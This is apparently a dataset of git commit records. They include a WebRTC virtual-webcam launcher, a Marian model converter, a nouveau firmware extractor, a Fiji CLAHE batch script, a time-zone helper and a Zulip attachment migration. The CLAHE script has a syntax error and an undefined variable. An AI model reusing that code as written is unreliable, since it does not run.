if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
<commit_before><commit_msg>Add script to ensure virtual webcam is running.
This script will check that a webcam is running and start it if it's
not currently running.
It's tailored to the way our buildbots are currently configured.
TEST=local execution on Windows, Mac and Linux.
BUG=none
R=phoglund@webrtc.org
Review URL: https://webrtc-codereview.appspot.com/1406005
git-svn-id: 917f5d3ca488f358c4d40eaec14422cf392ccec9@3981 4adac7df-926f-26a2-2b94-8c16560cd09d<commit_after>#!/usr/bin/env python
# Copyright (c) 2013 The WebRTC project authors. All Rights Reserved.
#
# Use of this source code is governed by a BSD-style license
# that can be found in the LICENSE file in the root of the source
# tree. An additional intellectual property rights grant can be found
# in the file PATENTS. All contributing project authors may
# be found in the AUTHORS file in the root of the source tree.
"""Checks if a virtual webcam is running and starts it if not.
Returns a non-zero return code if the webcam could not be started.
Prerequisites:
* Python must have the psutil package installed.
* Windows: a scheduled task named 'ManyCam' must exist and be configured to
launch ManyCam preconfigured to auto-play the test clip.
* Mac: ManyCam must be installed in the default location and be preconfigured
to auto-play the test clip.
* Linux: The v4l2loopback must be loaded to the kernel already (with the
devices=2 argument) and the v4l2_file_player application must be compiled and
put in the location specified below.
"""
import psutil
import subprocess
import sys
WEBCAM_WIN = ['schtasks', '/run', '/tn', 'ManyCam']
WEBCAM_MAC = ['open', '/Applications/ManyCam/ManyCam.app']
WEBCAM_LINUX = (
'$HOME/fake-webcam-driver/linux/v4l2_file_player/v4l2_file_player '
'$HOME/webrtc_video_quality/reference_video.yuv 640 480 /dev/video1 &')
def IsWebCamRunning():
if sys.platform == 'win32':
process_name = 'ManyCam.exe'
elif sys.platform.startswith('darwin'):
process_name = 'ManyCam'
elif sys.platform.startswith('linux'):
process_name = 'v4l2_file_player'
else:
raise Exception('Unsupported platform: %s' % sys.platform)
for p in psutil.get_process_list():
if process_name == p.name:
print 'Found a running virtual webcam (%s with PID %s)' % (p.name, p.pid)
return True
return False
def Main():
if IsWebCamRunning():
return 0
try:
if sys.platform == 'win32':
subprocess.check_call(WEBCAM_WIN)
elif sys.platform.startswith('darwin'):
subprocess.check_call(WEBCAM_MAC)
elif sys.platform.startswith('linux'):
subprocess.check_call(WEBCAM_LINUX, shell=True)
print 'Successfully launched virtual webcam.'
return 0
except Exception as e:
print 'Failed to launch virtual webcam: %s' % e
if __name__ == '__main__':
sys.exit(Main())
|
|
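A note on the record above: psutil.get_process_list() and the bare p.name attribute it relies on were removed in later psutil releases. The equivalent check against a modern psutil would look like this (a sketch, not the recorded code):
import psutil

def is_process_running(name):
    # process_iter(attrs=...) prefetches the requested fields for each process
    for p in psutil.process_iter(attrs=["name"]):
        if p.info["name"] == name:
            return True
    return False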
aed31cd5d5341712819772d27ec99e364f20e8d0
|
scripts/contrib/inject_ctt.py
|
scripts/contrib/inject_ctt.py
|
#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
Add script for injecting 'decoder_c_tt'
|
Add script for injecting 'decoder_c_tt'
|
Python
|
mit
|
marian-nmt/marian-train,emjotde/amunmt,marian-nmt/marian-train,marian-nmt/marian-train,emjotde/Marian,emjotde/amunn,marian-nmt/marian-train,amunmt/marian,emjotde/amunmt,emjotde/amunn,amunmt/marian,amunmt/marian,marian-nmt/marian-train,emjotde/amunmt,emjotde/Marian,emjotde/amunmt,emjotde/amunn,emjotde/amunn
|
Add script for injecting 'decoder_c_tt'
|
#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script for injecting 'decoder_c_tt'<commit_after>
|
#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
Add script for injecting 'decoder_c_tt'#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
<commit_before><commit_msg>Add script for injecting 'decoder_c_tt'<commit_after>#!/usr/bin/env python
from __future__ import print_function
import sys
import argparse
import numpy as np
DESC = "Add 'decoder_c_tt' required by Amun to a model trained with Marian v1.6.0+"
def main():
args = parse_args()
print("Loading model {}".format(args.input))
model = np.load(args.input)
if "decoder_c_tt" in model:
print("The model already contains 'decoder_c_tt'")
exit()
print("Adding 'decoder_c_tt' to the model")
amun = {"decoder_c_tt": np.zeros((1, 0))}
for tensor_name in model:
amun[tensor_name] = model[tensor_name]
print("Saving model...")
np.savez(args.output, **amun)
def parse_args():
parser = argparse.ArgumentParser(description=DESC)
parser.add_argument("-i", "--input", help="input model", required=True)
parser.add_argument("-o", "--output", help="output model", required=True)
return parser.parse_args()
if __name__ == "__main__":
main()
|
|
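A quick way to verify the injection from the record above worked (file names invented for illustration):
import numpy as np

# after running: python inject_ctt.py -i model.npz -o model.amun.npz
model = np.load("model.amun.npz")
assert "decoder_c_tt" in model
assert model["decoder_c_tt"].shape == (1, 0)  # the empty tensor Amun looks for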
2b801401f57fed8a794812d2f3cc737b243999dc
|
extract-nouveau-fw.py
|
extract-nouveau-fw.py
|
#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
Add temporary firmware extraction file
|
Add temporary firmware extraction file
|
Python
|
mit
|
NVIDIA/tegra-rootfs-scripts
|
Add temporary firmware extraction file
|
#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
<commit_before><commit_msg>Add temporary firmware extraction file<commit_after>
|
#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
Add temporary firmware extraction file#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
<commit_before><commit_msg>Add temporary firmware extraction file<commit_after>#!/usr/bin/python
import struct, sys
if len(sys.argv) != 2:
print("Please specify the path to gk20a_ctxsw.bin to extract the firmware")
sys.exit(1)
def get_int(blob, pos):
return struct.unpack('<i', blob[pos:pos + 4])[0]
blob = open(sys.argv[1], 'r').read()
n_regions = get_int(blob, 4)
for i in range(n_regions):
f = None
rtype = get_int(blob, 8 + i * 12)
rlen = get_int(blob, 12 + i * 12)
rstart = get_int(blob, 16 + i * 12)
if rtype == 0:
f = open('nvea_fuc409d', 'wb')
elif rtype == 1:
f = open('nvea_fuc409c', 'wb')
elif rtype == 2:
f = open('nvea_fuc41ad', 'wb')
elif rtype == 3:
f = open('nvea_fuc41ac', 'wb')
if f:
f.write(blob[rstart:rstart + rlen])
|
|
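A note on the record above: the script assumes a little-endian layout, an int32 region count at byte offset 4 followed by 12-byte (type, length, start) records. A self-contained sketch of reading one such record with struct (the values are fabricated):
import struct

record = struct.pack('<iii', 1, 64, 256)         # type=1, length=64, start=256
rtype, rlen, rstart = struct.unpack('<iii', record)
print(rtype, rlen, rstart)                       # -> 1 64 256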
1025b1d773b230e47633ec7c67d451adcd5ac957
|
src/convert_dir_to_CLAHE.py
|
src/convert_dir_to_CLAHE.py
|
#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
Add script to CLAHE images in a directory via FIJI
|
Add script to CLAHE images in a directory via FIJI
|
Python
|
mit
|
seung-lab/Julimaps,seung-lab/Julimaps
|
Add script to CLAHE images in a directory via FIJI
|
#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
<commit_before><commit_msg>Add script to CLAHE images in a directory via FIJI<commit_after>
|
#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
Add script to CLAHE images in a directory via FIJI#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
<commit_before><commit_msg>Add script to CLAHE images in a directory via FIJI<commit_after>#!/usr/bin/env jython
from ij import IJ
import os
from mpicbg.ij.clahe import Flat
from ij.process import ImageConverter
# http://fiji.sc/wiki/index.php/Enhance_Local_Contrast_(CLAHE)
# http://fiji.sc/cgi-bin/gitweb.cgi?p=mpicbg.git;a=blob;f=mpicbg/ij/clahe/PlugIn.java;h=663153764493547de560c08ee11f2e6b1e7e1a32;hb=HEAD
dir = "/usr/people/tmacrina/Desktop/test/"
blocksize = 50
histogram_bins = 128
maximum_slope = 3
mask = "*None*"
composite = False
mask = None
files = os.listdir(dir)
files.sort()
for file in files:
if file.endswith(".tif")
fn = os.path.join(dir, file)
imp = IJ.openImage(path)
output_fn = os.path.splitext(fn)[0] + "_CLAHE_8bit.tif"
imp = IJ.openImage(fn)
Flat.getFastInstance().run( imp,
blocksize,
histogram_bins,
maximum_slope,
mask,
composite )
ImageConverter(imp).convertToGray8()
IJ.save(imp, output_fn)
|
|
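For running a comparable contrast enhancement outside Fiji, scikit-image's equalize_adapthist is a rough analogue of CLAHE (not the mpicbg implementation used above, and its parameters do not map one-to-one to blocksize/bins/slope; file names invented):
from skimage import exposure, io, img_as_ubyte

img = io.imread("section.tif")  # hypothetical input file
out = exposure.equalize_adapthist(img, kernel_size=50, clip_limit=0.01)
io.imsave("section_CLAHE_8bit.tif", img_as_ubyte(out))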
426cdc9a82be52dbe7602273faaf0b38fb87d7cd
|
hotline/common/time_zone.py
|
hotline/common/time_zone.py
|
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
Add function to get time and date based on time zone
|
Add function to get time and date based on time zone
|
Python
|
mit
|
wearhacks/hackathon_hotline
|
Add function to get time and date based on time zone
|
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
<commit_before><commit_msg>Add function to get time and date based on time zone<commit_after>
|
from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
Add function to get time and date based on time zonefrom datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
<commit_before><commit_msg>Add function to get time and date based on time zone<commit_after>from datetime import datetime
from pytz import timezone
FORMAT = "%Y-%m-%d %H%M"
TIME_ZONE = 'Europe/Paris'
def current_time_zone_info():
current_time = datetime.now(timezone(TIME_ZONE)).strftime(FORMAT)
return current_time.split()
|
|
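A note on the record above: current_time_zone_info() returns a [date, time] pair of strings, because strftime produces one space-separated string and split() cuts it in two. A quick standalone check (output values illustrative):
from datetime import datetime
from pytz import timezone

now = datetime.now(timezone('Europe/Paris')).strftime("%Y-%m-%d %H%M")
print(now.split())  # e.g. ['2016-07-01', '1830'] -- a [date, time] pair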
4438a09b307e518daa059a79d9c1c1dec2ba013e
|
zerver/migrations/0041_create_attachments_for_old_messages.py
|
zerver/migrations/0041_create_attachments_for_old_messages.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from django.db import migrations
from django.db.backends.postgresql_psycopg2.schema import DatabaseSchemaEditor
from django.db.migrations.state import StateApps
from zerver.lib.upload import attachment_url_re, attachment_url_to_path_id
def check_and_create_attachments(apps, schema_editor):
# type: (StateApps, DatabaseSchemaEditor) -> None
STREAM = 2
Message = apps.get_model('zerver', 'Message')
Attachment = apps.get_model('zerver', 'Attachment')
Stream = apps.get_model('zerver', 'Stream')
for message in Message.objects.filter(has_attachment=True, attachment=None):
attachment_url_list = attachment_url_re.findall(message.content)
for url in attachment_url_list:
path_id = attachment_url_to_path_id(url)
user_profile = message.sender
is_message_realm_public = False
if message.recipient.type == STREAM:
stream = Stream.objects.get(id=message.recipient.type_id)
is_message_realm_public = not stream.invite_only and stream.realm.domain != "mit.edu"
if path_id is not None:
attachment = Attachment.objects.create(
file_name=os.path.basename(path_id), path_id=path_id, owner=user_profile,
realm=user_profile.realm, is_realm_public=is_message_realm_public)
attachment.messages.add(message)
class Migration(migrations.Migration):
dependencies = [
('zerver', '0040_realm_authentication_methods'),
]
operations = [
migrations.RunPython(check_and_create_attachments)
]
|
Add migration to create attachments for old uploads.
|
Add migration to create attachments for old uploads.
This migration ensures that all historically uploaded files from
before we started tracking files in the Zulip database via the
Attachment model have Attachment objects.
This has been tested by tabbott against a production server to ensure
that it results in all old uploaded files having corresponding
attachment objects.
Merging this change is a key prerequisite for making our adding
attachment access controls in an enforcing fashion.
|
Python
|
apache-2.0
|
jackrzhang/zulip,andersk/zulip,zulip/zulip,mahim97/zulip,showell/zulip,hackerkid/zulip,punchagan/zulip,peguin40/zulip,jrowan/zulip,calvinleenyc/zulip,hackerkid/zulip,verma-varsha/zulip,TigorC/zulip,vikas-parashar/zulip,jphilipsen05/zulip,andersk/zulip,zacps/zulip,dhcrzf/zulip,sonali0901/zulip,zulip/zulip,mahim97/zulip,PhilSk/zulip,vaidap/zulip,Galexrt/zulip,Jianchun1/zulip,punchagan/zulip,cosmicAsymmetry/zulip,vikas-parashar/zulip,susansls/zulip,amyliu345/zulip,sonali0901/zulip,dhcrzf/zulip,zacps/zulip,isht3/zulip,PhilSk/zulip,jackrzhang/zulip,dattatreya303/zulip,sonali0901/zulip,timabbott/zulip,JPJPJPOPOP/zulip,amanharitsh123/zulip,Galexrt/zulip,paxapy/zulip,mahim97/zulip,PhilSk/zulip,vabs22/zulip,sharmaeklavya2/zulip,brainwane/zulip,PhilSk/zulip,vaidap/zulip,Jianchun1/zulip,punchagan/zulip,cosmicAsymmetry/zulip,KingxBanana/zulip,aakash-cr7/zulip,dhcrzf/zulip,zacps/zulip,isht3/zulip,PhilSk/zulip,jackrzhang/zulip,dattatreya303/zulip,sonali0901/zulip,timabbott/zulip,JPJPJPOPOP/zulip,amanharitsh123/zulip,AZtheAsian/zulip,tommyip/zulip,vabs22/zulip,sharmaeklavya2/zulip,eeshangarg/zulip,aakash-cr7/zulip,showell/zulip,aakash-cr7/zulip,susansls/zulip,jackrzhang/zulip,zulip/zulip,arpith/zulip,souravbadami/zulip,timabbott/zulip,souravbadami/zulip,AZtheAsian/zulip,aakash-cr7/zulip,cosmicAsymmetry/zulip,KingxBanana/zulip,PhilSk/zulip,rht/zulip,dawran6/zulip,paxapy/zulip,reyha/zulip,dattatreya303/zulip,Galexrt/zulip,christi3k/zulip,samatdav/zulip,eeshangarg/zulip,vaidap/zulip,souravbadami/zulip,j831/zulip,kou/zulip,synicalsyntax/zulip,verma-varsha/zulip,paxapy/zulip,reyha/zulip,KingxBanana/zulip,hackerkid/zulip,hackerkid/zulip,brockwhittaker/zulip,ryanbackman/zulip,timabbott/zulip,isht3/zulip,rishig/zulip,sonali0901/zulip,shubhamdhama/zulip,niftynei/zulip,samatdav/zulip,verma-varsha/zulip,tommyip/zulip,andersk/zulip,vikas-parashar/zulip,tommyip/zulip,vaidap/zulip,christi3k/zulip,andersk/zulip,timabbott/zulip,zulip/zulip,blaze225/zulip,amanharitsh123/zulip,brockwhittaker/zulip,souravbadami/zulip,cosmicAsymmetry/zulip,brainwane/zulip,joyhchen/zulip,samatdav/zulip,arpith/zulip,rht/zulip,TigorC/zulip,brainwane/zulip,brockwhittaker/zulip,Galexrt/zulip,mahim97/zulip,punchagan/zulip,arpith/zulip,joyhchen/zulip,jainayush975/zulip,souravbadami/zulip,AZtheAsian/zulip,dattatreya303/zulip,vabs22/zulip,amanharitsh123/zulip,calvinleenyc/zulip,punchagan/zulip,verma-varsha/zulip,dawran6/zulip,joyhchen/zulip,rht/zulip,grave-w-grave/zulip,peguin40/zulip,joyhchen/zulip,christi3k/zulip,dattatreya303/zulip,verma-varsha/zulip,vikas-parashar/zulip,Diptanshu8/zulip,Juanvulcano/zulip,brockwhittaker/zulip,christi3k/zulip,reyha/zulip,KingxBanana/zulip,calvinleenyc/zulip,cosmicAsymmetry/zulip,showell/zulip,j831/zulip,dhcrzf/zulip,souravbadami/zulip,zulip/zulip,dawran6/zulip,sonali0901/zulip,SmartPeople/zulip,rishig/zulip,susansls/zulip,TigorC/zulip,joyhchen/zulip,timabbott/zulip,JPJPJPOPOP/zulip,jphilipsen05/zulip,rishig/zulip,jphilipsen05/zulip,samatdav/zulip,Juanvulcano/zulip,zacps/zulip,jainayush975/zulip,paxapy/zulip,rht/zulip,dhcrzf/zulip,zacps/zulip,SmartPeople/zulip,synicalsyntax/zulip,Jianchun1/zulip,andersk/zulip,jainayush975/zulip,jphilipsen05/zulip,sharmaeklavya2/zulip,kou/zulip,joyhchen/zulip,sharmaeklavya2/zulip,isht3/zulip,grave-w-grave/zulip,jainayush975/zulip,vaidap/zulip,shubhamdhama/zulip,AZtheAsian/zulip,TigorC/zulip,synicalsyntax/zulip,arpith/zulip,calvinleenyc/zulip,shubhamdhama/zulip,vaidap/zulip,timabbott/zulip,eeshangarg/zulip,rishig/zulip,niftynei/zulip,zulip/zulip,blaze225/zulip,showell/zulip,kou/zulip,shubhamdhama/zulip,kou/zulip,synicalsyntax/zulip,niftynei/zulip,brainwane/zulip,reyha/zulip,jackrzhang/zulip,amanharitsh123/zulip,j831/zulip,hackerkid/zulip,showell/zulip,Diptanshu8/zulip,brainwane/zulip,mahim97/zulip,synicalsyntax/zulip,shubhamdhama/zulip,jackrzhang/zulip,susansls/zulip,grave-w-grave/zulip,eeshangarg/zulip,AZtheAsian/zulip,tommyip/zulip,vikas-parashar/zulip,calvinleenyc/zulip,zacps/zulip,ryanbackman/zulip,grave-w-grave/zulip,Galexrt/zulip,tommyip/zulip,paxapy/zulip,mahim97/zulip,JPJPJPOPOP/zulip,jainayush975/zulip,brockwhittaker/zulip,amyliu345/zulip,amyliu345/zulip,jackrzhang/zulip,christi3k/zulip,blaze225/zulip,jainayush975/zulip,dawran6/zulip,eeshangarg/zulip,KingxBanana/zulip,peguin40/zulip,punchagan/zulip,samatdav/zulip,zulip/zulip,KingxBanana/zulip,arpith/zulip,Jianchun1/zulip,eeshangarg/zulip,niftynei/zulip,hackerkid/zulip,mahim97/zulip,Galexrt/zulip,kou/zulip,SmartPeople/zulip,jphilipsen05/zulip,brainwane/zulip,amyliu345/zulip,Diptanshu8/zulip,blaze225/zulip,blaze225/zulip,j831/zulip,dhcrzf/zulip,vikas-parashar/zulip,Juanvulcano/zulip,calvinleenyc/zulip,reyha/zulip,synicalsyntax/zulip,sonali0901/zulip,peguin40/zulip,grave-w-grave/zulip,susansls/zulip,ryanbackman/zulip,punchagan/zulip,christi3k/zulip,peguin40/zulip,jrowan/zulip,JPJPJPOPOP/zulip,zulip/zulip,sharmaeklavya2/zulip,amanharitsh123/zulip,dhcrzf/zulip,isht3/zulip,isht3/zulip,TigorC/zulip,cosmicAsym